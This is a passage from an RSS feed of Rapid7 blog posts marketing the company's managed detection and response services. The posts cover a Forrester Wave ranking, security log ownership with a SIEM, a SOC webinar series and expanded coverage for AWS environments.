      <pubDate>Mon, 31 Mar 2025 13:01:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd4aad49e3e7376e0/683de1d2bc38b155f7477d5d/gettyimages-2154830323.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Why MDR In 2025 Is About Scaling With Purpose]]></title>
      <description><![CDATA[<p>Forrester recently released “The Forrester Wave™: Managed Detection and Response (MDR) Services, Q1 2025,” highlighting the top 10 MDR providers out of more than 600 worldwide. While we’re honored to be recognized in such a competitive market, Rapid7’s designation underscores a fundamental difference in perspective: our customers consistently tell us that their top priority is cost-effective, comprehensive security operations at scale. They need contextually risk-aware attack surface visibility and protection without incurring exorbitant expenses, and that is precisely where we excel.</p><h2>Our Mission: Monitor 100% Of What Matters—Affordably</h2><p>The Wave places a premium on detection engineering and coverage breadth. We agree that those factors matter, but for most organizations, success lies in balancing coverage breadth and depth, seamless scalability, and cost constraints. You shouldn't ingest data for the sake of it—doing so drives spiraling costs and complexity. Instead, you need measured, focused monitoring of the specific data that impacts your risk profile.</p><p>What sets Rapid7 apart is our deeper understanding of the attack surface—we collect and integrate more data about the state of each customer’s environment than any other MDR provider. By honing in on meaningful, high-fidelity sources rather than chasing noise, our platform minimizes false positives and unnecessary overhead, ensuring you get the best possible visibility.</p><h2>A Deeply Integrated Approach: The Key To Scalable Security</h2><p>Modern security operations demand an ecosystem that brings together data from not only your endpoints, but also your networks, clouds, identities, and third-party tools—without a budget meltdown. 
<a href="/platform/">Rapid7’s Command Platform</a> was built precisely for this purpose, anchoring on our Next-Gen SIEM and a flexible architecture that is both data-rich and cost-conscious.</p><p>Uniquely, we deliver a fully integrated MDR experience from end to end:</p><ul><li><strong>Native SIEM Capabilities</strong>: Our platform correlates data across multiple attack surfaces, from the endpoint to the cloud, natively and in real time.</li><li><strong>Deep Tech Synergy</strong>: The same models that power our vulnerability management and attack surface analytics fuel our MDR, so you gain actionable insights without juggling multiple, disconnected vendors.</li><li><strong>In-Platform Partnership, Faster Resolution</strong>: Collaborate directly within the Command Platform with security veterans from our global SOC to augment internal teams and accelerate investigations, reduce time to remediation, and build long-term resilience.</li></ul><h2>People + AI-Driven Efficiency: More Than Just Buzzwords</h2><p>At Rapid7, AI isn’t a marketing tagline. 
We take a deliberate, responsible approach to AI and ML, building AI to power tangible improvements for our customers:</p><ul><li><strong>Faster, High-Fidelity Detections</strong>: Through machine learning on massive volumes of behavioral data, we pinpoint real threats quickly and effectively.</li><li><strong>Enhanced Analyst Experience</strong>: Our AI-assisted investigations spotlight suspicious activity, giving our team immediate, context-rich information that saves you from chasing endless false positives.</li><li><strong>Transparent Partnership</strong>: We don’t hide behind a “black box.” Our security analysts operate out of the same platform and share their findings with you in real time—creating a genuinely collaborative environment rather than an outsourced service.</li></ul><h2>Going Beyond The Wave: A Blueprint For Resilient Security</h2><ul><li><strong>A True Partnership Model, Including Unlimited Incident Response</strong>: Our team acts as an extension of your own, giving you full-scale incident support at no extra cost. Security emergencies don’t respect budget approvals, so neither do we.</li><li><strong>Unparalleled Insight Into The Attack Surface</strong>: We combine comprehensive visibility (both external and internal) with continual intelligence on attacker techniques, providing deeper context on potential exposures. Stay tuned for more announcements in this area.</li><li><strong>Community Focus</strong>: Rapid7 proudly supports the broader cybersecurity community through key open-source projects like Metasploit and Velociraptor, keeping us close to innovative researchers and practitioners worldwide.</li></ul><h2>What’s Next: Continued MDR Innovation</h2><p>We recognize some organizations may look at our placement in the Wave and wonder about Rapid7’s future roadmap. 
Rest assured, we’re just getting started:</p><ul><li><strong>Extended Cloud & Identity Threat Coverage</strong>: From AWS to Azure to Google Cloud—and major identity platforms—we’re broadening our detection capabilities to reflect attackers’ evolving tactics.</li><li><strong>AI-Driven SOC Investments</strong>: Our upcoming releases significantly reduce alert noise and speed up investigations, leveraging context-based <a href="/platform/threat-intelligence-tip/">threat intelligence</a> tailored to your specific environment.</li><li><strong>Deeper Integrations and Partnerships</strong>: We’ll continue building alliances with leading technologies so your existing tools—alongside our Command Platform—deliver holistic security without the bloat.</li><li><strong>See and Secure Your Attack Surface</strong>: Upcoming releases deepen our visibility into customer environments to secure the entire digital estate.</li></ul><p>These enhancements begin rolling out next month, and we can’t wait to share how they further advance automated detection, rapid response, and proactive risk mitigation.</p><h2>The Bottom Line: Effective, Affordable, and Scalable MDR</h2><p>We prioritize what we know customers need. We’re focused on delivering a scalable, cost-effective MDR service that partners deeply with your team to optimize long-term resilience. If you need MDR that goes far beyond just the endpoint and beyond just outsourced alerting—and want to maintain your budget without sacrificing innovation—Rapid7 stands ready to transform your security operations.</p><p>Ready to explore how Rapid7 MDR can fit your needs?<br/>Check out our <a href="/services/managed-detection-and-response-mdr/demo/">Managed Threat Complete</a> solution, <a href="/services/managed-detection-and-response-mdr/enterprise/">MDR for Enterprise</a>, or reach out to our team to learn how we can help scale your success. Let’s move past the checkbox approach to MDR—together.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/02/27/why-mdr-in-2025-is-about-scaling-with-purpose</link>
      <guid isPermaLink="false">blt2df72de9c1236c06</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Managed Threat Complete]]></category>
      <category><![CDATA[Forrester Wave]]></category><dc:creator><![CDATA[Craig Adams]]></dc:creator>
      <pubDate>Thu, 27 Feb 2025 14:44:58 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9b16eaccd0675c91/683ddc893a1c5aa5354ba74a/gettyimages-1828036562.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[MDR + SIEM: Why Full Access to Your Security Logs is Non-Negotiable]]></title>
      <description><![CDATA[<p>Many <a href="/fundamentals/what-is-managed-detection-and-response-mdr/">Managed Detection and Response (MDR)</a> providers promise world-class <a href="/fundamentals/threat-detection/">threat detection</a>, but behind the scenes they lock away your security logs, limiting your visibility and control. It’s your data — so why don’t you have full access to it? Isn’t the whole point of security to see everything happening in your environment? Without full access to your own data, you’re left dependent on their tools, their timelines, and their interpretations of security events.</p><p>This isn’t just an inconvenience — it’s a risk.</p><p>Pairing MDR with a <a href="/fundamentals/siem/">Security Information and Event Management (SIEM)</a> solution ensures complete transparency, enabling real-time investigation, historical <a href="/fundamentals/what-is-threat-hunting/">threat hunting</a>, compliance readiness, and deeper threat insights. If you don’t have full access to your security logs, you’re not truly in control of your cybersecurity strategy. And in today’s high-stakes environment, that’s simply not an option.</p><p>With <a href="/services/managed-detection-and-response-mdr/">Rapid7 MDR</a>, you don’t just gain a service — you gain full access and control over your data, unlocking significant advantages for compliance, long-term strategy, and cross-platform analytics.</p><h2>The Benefits of Owning your Data</h2><p>When it comes to cybersecurity, data is everything. Logs, events, and alerts are the building blocks of threat detection, incident response, and forensic investigations. Owning your data, particularly with Rapid7’s 13-month data retention, empowers you in ways that vendor-locked solutions cannot match. Here’s how:</p><ul><li><strong>Cross-platform analytics</strong><br/>Modern security teams operate across cloud, hybrid, and on-prem environments. 
Owning your data means you can integrate security telemetry across platforms, enabling immediate answers and deeper correlations between systems for accurate threat detection.</li><li><strong>Compliance made easier</strong><br/>Many industries require businesses to retain data for specific periods to meet regulatory standards such as GDPR, HIPAA, or PCI DSS. Rapid7’s extended data retention ensures you’re always audit-ready and compliant without relying on third-party intermediaries for log retrieval.</li><li><strong>Historical threat hunting and forensics</strong><br/>Cyber threats evolve over time — sometimes lying dormant for months before manifesting as an attack. With 13 months of historical data, the MDR service can trace attack patterns, uncover dormant threats, and conduct deep-dive forensic investigations to prevent repeat breaches. Advanced threats don’t just appear out of nowhere — long-term attack campaigns require long-term visibility. If you don’t know how an attacker got in, how can you ensure they won’t come back?</li></ul><h2>The hidden risks of limited data access</h2><p>Many MDR providers operate in a “black box” model, where security data is siloed within their systems, restricting user access and limiting independent investigations. This lack of transparency not only creates dependency on the vendor but can also lead to serious security and operational risks:</p><ul><li><strong>Slower incident response</strong><br/>Seconds matter when attackers are inside your environment. Security teams can waste critical time waiting for an MDR provider to retrieve logs or investigate issues, delaying decisive action during <a href="/fundamentals/types-of-attacks/">cyberattacks</a>.</li><li><strong>Reduced security visibility</strong><br/>Cyber threats don’t operate in isolation. Without full data access, security teams miss critical patterns, struggle to correlate events, and lose the ability to conduct independent investigations. The result? 
A weakened security posture and increased attack exposure.</li><li><strong>Hindered cross-team collaboration</strong><br/>Security isn’t just a SOC function — it requires collaboration with IT, compliance, risk, and leadership teams. When data is locked behind an MDR provider’s system, security teams cannot share insights or validate threats with other departments effectively. This slows down decision-making, creates blind spots across IT infrastructure, and reduces the organization’s ability to work as a unified team in responding to threats.</li><li><strong>Compliance gaps</strong><br/>If an organization cannot independently access its logs, it may struggle to provide auditors with the necessary evidence for compliance frameworks like GDPR, HIPAA, DORA, NIS2, or PCI DSS.</li></ul><h2>Rapid7 MDR: Transparency and control</h2><p>Rapid7’s MDR service offers transparent and unrestricted access to your data through <a href="/products/insightidr/">InsightIDR</a>, our cloud-native, next-gen SIEM built for both detection and response. Unlike traditional SIEMs that focus solely on log aggregation, InsightIDR actively identifies and prioritizes real threats by analyzing user and attacker behavior, leveraging <a href="/fundamentals/deception-technology/">deception technology</a>, and utilizing built-in <a href="/fundamentals/what-is-threat-intelligence/">threat intelligence</a>. This ensures not only full visibility but also rapid detection and response to advanced threats, helping security teams act faster. 
With Rapid7, you get:</p><ul><li><strong>Real-time insights</strong>: Monitor and analyze security data in real time for faster response to threats — no waiting for vendor-controlled access.</li><li><strong>Custom dashboards</strong>: Rapid7’s dashboards support operational and executive reporting, making it easier for security teams to collaborate with IT, compliance, and leadership on security progress, priorities, and effectiveness.</li><li><strong>Custom detections</strong>: Security teams can create tailored detections across any data sent to InsightIDR based on their specific infrastructure, threat models, and business needs. This ensures that critical anomalies and suspicious behaviors don’t get lost in generic detection rules.</li><li><strong>Complete transparency</strong>: Audit every action taken by Rapid7 analysts and your SOC team, and see investigations and comments for transparency and collaboration.</li></ul><h2>Command the SIEM advantage: Context and correlation matter</h2><p>A key differentiator of Rapid7 MDR is that InsightIDR is more than just a SIEM — it’s a next-gen detection and response platform. Many MDR solutions provide basic alerting but lack the advanced behavioral analytics and automated response capabilities of InsightIDR. 
By combining SIEM, user behavior analytics, deception technology, and automated response orchestration, InsightIDR proactively detects threats, correlates events across your environment, and enables faster, more precise response actions.</p><p>Without a SIEM, organizations struggle with:</p><ul><li><strong>Limited visibility into user behavior,</strong> making it harder to detect insider threats or compromised accounts.</li><li><strong>No long-term correlation of security events,</strong> reducing the ability to uncover sophisticated, multi-stage attacks.</li><li><strong>Gaps in historical threat hunting,</strong> restricting security teams from investigating past incidents, identifying trends, and improving future defenses.</li></ul><p>With InsightIDR, Rapid7 MDR goes beyond detection — it provides comprehensive context, automation, and deep forensic capabilities that elevate an organization’s security maturity.</p><h2>Take back command of your security data</h2><p>In a world where vendor lock-in is common, maintaining ownership and access to your security data is not just a convenience, it’s a necessity. Without it, organizations risk compliance failures, slower response times, and reduced visibility into their own security posture.</p><p>With Rapid7 MDR, you’re not just subscribing to a service — you’re gaining a proactive security partner. You get unrestricted access, 13-month data retention, and real-time threat detection and response — ensuring compliance, faster incident containment, and smarter security decisions powered by InsightIDR’s built-in detection capabilities.</p><p>Don’t settle for an MDR solution that keeps you in the dark. Choose an approach that empowers your security team with full access and control over your data.</p><p><strong>Ready to experience the difference? </strong><a href="/services/managed-detection-and-response-mdr/"><strong>Learn more about Rapid7 MDR today</strong></a><strong>.</strong></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/02/26/mdr-siem-why-full-access-to-your-security-logs-is-non-negotiable</link>
      <guid isPermaLink="false">blt18676f529be0c800</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[SIEM]]></category><dc:creator><![CDATA[René Fusco]]></dc:creator>
      <pubDate>Wed, 26 Feb 2025 17:03:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17ac66d65da84273/683de60818a5532ea268722c/gettyimages-1139805781.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Securing Success: Stories from the SOC Webinar Series]]></title>
      <description><![CDATA[<p>In today’s fast-paced threat landscape, SOC (Security Operations Center) teams are under relentless pressure. Cyberattacks are evolving, threat volumes are skyrocketing, and attackers are exploiting vulnerabilities faster than ever. To navigate these challenges, Rapid7 has launched the <strong>"Securing Success: Stories from the SOC"</strong> webinar series.</p><p>This three-part series provides practical insights, expert advice, and actionable strategies for SOC teams. Featuring Rapid7’s leading experts and real-world case studies, the series covers everything from tackling incidents to building long-term resilience in your SOC.</p><h2>Why Watch? Key Insights from the Series</h2><h3>Webinar 1: Securing Success: Spotlight on the SOC</h3><p>Kicking off the series, this webinar offers a behind-the-scenes look at Rapid7’s SOC data and incident trends. Learn how attackers are leveraging cloud misconfigurations, exploiting vulnerabilities, and bypassing MFA. The session highlights actionable steps to detect these threats earlier and optimize your defenses.<br/><a href="https://www.brighttalk.com/webcast/10457/606980?utm_source=Rapid7?utm_source=blog&amp;utm_medium=website&amp;utm_content=soc-series-webcast&amp;utm_campaign=global-mdr-campaign-blogs-prospect-eng"><strong>Watch the Webinar</strong></a></p><h3>Webinar 2: Securing Success: Unlimited Incident Response</h3><p>Dive into an in-depth case study of a ransomware attack and explore how Rapid7’s unlimited incident response service empowers teams to contain and recover from attacks. 
Discover the importance of leveraging tools like Velociraptor for forensic investigation, implementing robust containment measures, and prioritizing response actions to mitigate impact.<br/><a href="https://www.brighttalk.com/webcast/10457/607019?utm_source=Rapid7?utm_source=blog&amp;utm_medium=website&amp;utm_content=soc-series-webcast&amp;utm_campaign=global-mdr-campaign-blogs-prospect-eng"><strong>Watch the Webinar</strong></a></p><h3>Webinar 3: Securing Success: Strengthening Your SOC</h3><p>In the series finale, Rapid7’s top experts, including Jaya Baloo and Raj Samani, address how to enhance SOC operations amidst rising attack volumes and evolving threats. From prioritizing vulnerabilities to leveraging curated threat intelligence, this session equips you with the strategies needed to strengthen your SOC and prepare for the future.<br/><a href="https://www.brighttalk.com/webcast/10457/607030?utm_source=Rapid7?utm_source=blog&amp;utm_medium=website&amp;utm_content=soc-series-webcast&amp;utm_campaign=global-mdr-campaign-blogs-prospect-eng"><strong>Watch the Webinar</strong></a></p><h2>Real Stories, Real Solutions</h2><p>Each session delivers actionable insights through real-world examples and expert guidance:</p><ul><li><strong>Improving Detection and Response:</strong> Learn how to identify attackers earlier by addressing common access methods like phishing, cloud misconfigurations, and unpatched vulnerabilities.</li><li><strong>Streamlining Incident Response:</strong> Explore Rapid7’s methodologies for tackling complex incidents, ensuring swift containment, and preventing future breaches.</li><li><strong>Building a Resilient SOC:</strong> Discover how threat intelligence, prioritization, and collaboration can help your team focus on what truly matters.</li></ul><h2>Take the Next Step in Protecting Your Organization</h2><p>Your attack surface is growing, and defending it requires the right tools and the right team of experts by your side. 
Learn how <strong>Rapid7’s Managed Detection & Response</strong> can help your organization unify total risk and threat coverage and keep you secure around the clock.</p><p>Amplify your SOC with the insights and tools to outsmart emerging threats, zero-in on the high fidelity signals that threaten your organization, and expertly respond around the clock. Discover how to take command with <a href="/services/managed-detection-and-response-mdr/"><strong>Managed Threat Complete</strong></a> here.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/01/10/securing-success-stories-from-the-soc-webinar-series</link>
      <guid isPermaLink="false">blt02191ae46c67178a</guid>
      <category><![CDATA[Security Operations (SOC)]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Emma Burdett]]></dc:creator>
      <pubDate>Fri, 10 Jan 2025 17:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcab4a0047178377b/683ddd2a18a5534f47686eeb/GettyImages-1448456712.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Expanded SOC Coverage Into AWS Environments with Rapid7 MXDR]]></title>
<description><![CDATA[<h3><em>Co-authored by Mikayla Wyman and Ryan Blanchard</em></h3><p>As organizations increasingly rely on AWS for scalability and innovation, the complexity of securing these environments grows. AWS offers a robust set of native services and a comprehensive ecosystem, but managing security signals and responding to threats across dynamic workloads can overwhelm even the most well-equipped teams.</p><p>Rapid7’s <a href="/services/managed-detection-and-response-mdr/">Managed Extended Detection and Response (MXDR) service</a> has focused on helping customers bridge this gap, unifying security telemetry from major cloud service providers including AWS and Azure, with expert-driven detection and response. With MXDR, organizations can confidently scale their cloud investments without sacrificing the comprehensive coverage they’re familiar with today.</p><h2>Tailored to AWS Workloads and Modern Cloud Security Challenges</h2><p>MXDR delivers the context and coverage needed to handle complex threats in AWS environments, providing a purpose-built service to address the specific challenges of securing modern cloud environments. With the extension of MXDR for AWS, teams can tailor their Rapid7 MXDR support to include triage, investigation, and response for critical GuardDuty alerts directly within their MDR service.</p><p>Layering native AWS telemetry with insights from other tools and environments creates a centralized, unified view of your security posture. With this context, our team is able to tailor protections and actions to the unique needs of your environment, safeguarding your assets more effectively against evolving threats. 
This comprehensive perspective empowers Rapid7 MDR analysts to operate at peak efficiency, ensuring your organization experiences a robust incident response lifecycle, from initial detection and alert triage to containment and response.</p><h2>Augmenting Your Security Team with a Fleet of CDR Experts</h2><p>Protecting your AWS environment doesn’t need to be a solo effort. With Rapid7 MXDR, you gain access to our extensive team of seasoned MDR analysts who diligently monitor, triage, and respond to incidents in real time, reducing operational burden. With an expert <a href="/fundamentals/what-is-managed-detection-and-response-mdr/">MDR</a> team on call, teams are ready to contain incidents and limit blast radius. Customized mitigation and response strategies for AWS workloads, aligned with your unique environment and risk tolerance, enable our team to provide clear insights, remediation guidance, and future mitigation recommendations to improve security and drive executive buy-in for security investments.</p><p>By deeply integrating cloud risk context from our industry-leading <a href="/fundamentals/what-is-cloud-native-application-protection-platform-cnapp/">CNAPP</a> capabilities into the incident response workflow, our MDR analysts are equipped with the environmental awareness needed to act more quickly on your behalf to stop attackers in their tracks.</p><p>Rapid7 MXDR eliminates the need for piecemeal tools and processes by delivering end-to-end security services that combine AWS-native telemetry with cross-platform intelligence. 
The result is comprehensive threat detection and mitigation across your AWS environments without the complexity of managing multiple tools, providing:</p><ul><li><strong>Cloud Attack Surface Visibility and Advanced Threat Detection: </strong>Correlating AWS telemetry with global threat intelligence to build a dynamic map of your environment, uncover sophisticated attacks and spot avenues for lateral movement.</li><li><strong>Continuous Coverage and Proactive Threat Hunting:</strong> Lean on our team of seasoned SOC experts who monitor, triage, and respond to incidents in real time, reducing operational burden.</li><li><strong>Visibility into Cloud Identities, Their Permissions and Privileges:</strong> Monitor all cloud accounts and identities and proactively spot anomalous and potentially malicious user behavior, privilege escalations, or unusual API calls.</li><li><strong>AI-Assisted Triage with Risk-Aware Context:</strong> Automatic context enrichment for cloud alerts with the relevant information SOC analysts need to understand the posture of a compromised account or resource and prioritize response.</li></ul><h2>Take Command of Your AWS Security Today</h2><p>Whether you’re protecting critical workloads or responding to active threats, Rapid7 <a href="/fundamentals/what-is-managed-xdr-mxdr/">managed XDR</a> enables organizations to secure their AWS environments with confidence. From continuous monitoring to expert response, Rapid7 ensures your AWS assets remain protected while allowing your team to focus on driving business innovation.</p><p><a href="/contact/">Contact Rapid7 today</a> to see how MXDR can elevate your AWS security posture.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2024/12/03/expanded-soc-coverage-into-aws-environments-with-rapid7-mxdr</link>
      <guid isPermaLink="false">bltc96e1cc527c78b40</guid>
      <category><![CDATA[Managed XDR]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Tue, 03 Dec 2024 14:01:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1e9fd158cbe4bc45/683de2a15619a1011bc6eb21/GettyImages-2166707299.jpg" medium="image" />
    </item>
  </channel>
</rss>